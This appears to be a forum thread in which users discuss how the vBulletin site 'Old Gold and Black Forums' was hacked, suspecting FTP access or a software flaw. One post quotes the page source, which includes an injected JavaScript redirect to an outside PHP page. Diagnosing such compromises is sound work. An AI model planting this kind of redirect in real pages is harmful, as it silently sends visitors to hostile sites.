Looks as though the hacker is still logged on... as "admin"
The hack is at the server/code level rather than from within the forum software. Probably a FTP hack unless there's some sort of strange VBulletin vulnerability that allows you to insert code onto the server.
<title>Old Gold and Black Forums - Powered by vBulletin</title>
</head>
<body>
<!-- logo -->
<script type="text/javascript">
window.location = "http://phlebotomyguide.net/ww.php"
</script>
<a name="top"></a>
<!-- <table border="0" width="100%" cellpadding="0" cellspacing="0" align="center">
<tr>
<td align="center"><a href="index.php"><img src="images/misc/Logo.png" border="0" alt="Old Gold and Black Forums" /></a></td>
</tr>
</table> -->
<div style="text-align: center;"><a href="index.php"><img src="images/misc/Logo.png" border="0" alt="Old Gold and Black Forums" style="margin: 0 auto; padding: 0" /></a></div>
<!-- /logo -->
Yea, that's where they stuck the JS hack. But if the admin password was weak or default, they likely got logged in to Vbulletin as well. I've never seen "admin" listed as a logged in user.
I think it's a VBulletin vulnerability.. Look where the script appears in a page source:
I just assumed that "admin" had logged in because there was a problem with the site.
Yeah, but that would be easy enough to insert via FTP. I'm not sure if VBulletin really has much ability to insert code via it's backend interface, but I haven't used it in a while.
I would honestly hope they don't use FTP to work on this site. Too insecure. Better to use SSL or SFTP... Oh well though.
I would honestly hope they don't use FTP to work on this site. Too insecure. Better to use SSL or SFTP... Oh well though.